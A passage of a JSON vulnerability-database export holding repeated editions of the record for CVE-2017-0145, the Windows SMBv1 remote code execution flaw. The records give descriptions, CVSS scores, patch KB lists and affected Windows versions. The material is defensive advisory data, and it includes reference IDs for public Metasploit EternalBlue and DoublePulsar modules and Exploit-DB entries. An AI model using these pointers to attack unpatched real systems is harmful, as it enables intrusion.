"differentElements": ["msAffectedSoftware"], "edition": 46}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-16T11:28:55", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-14T04:52:34", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-14T04:52:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3177186", "KB3210720", "KBMS16-110, 3187754", "KB4012214", "KB3210721", "KB3213986", "KB4012213", "KB4012606", "KB4012215", "KB3212646", "KB3205409", "KB4012212", "KB4013198", "KB4012217", "KB4012216", "KB4014077", "KB4012598", "KB4013429", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-16T11:28:55", "differentElements": ["msAffectedSoftware"], "edition": 47}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-16T12:44:29", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB4012606", "KB4012214", "KB3213986", "KB3212646", "KB4012212", "KB4012213", "KB3210720", "KB4013198", "KB3205401", "KB4014077", "KB4013429", "KB3177186", "KB4012217", "KB3210721", "KB4012215", "KB4012598", "KB3205409", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-16T12:44:29", "differentElements": ["msAffectedSoftware"], "edition": 48}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-17T02:51:36", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": 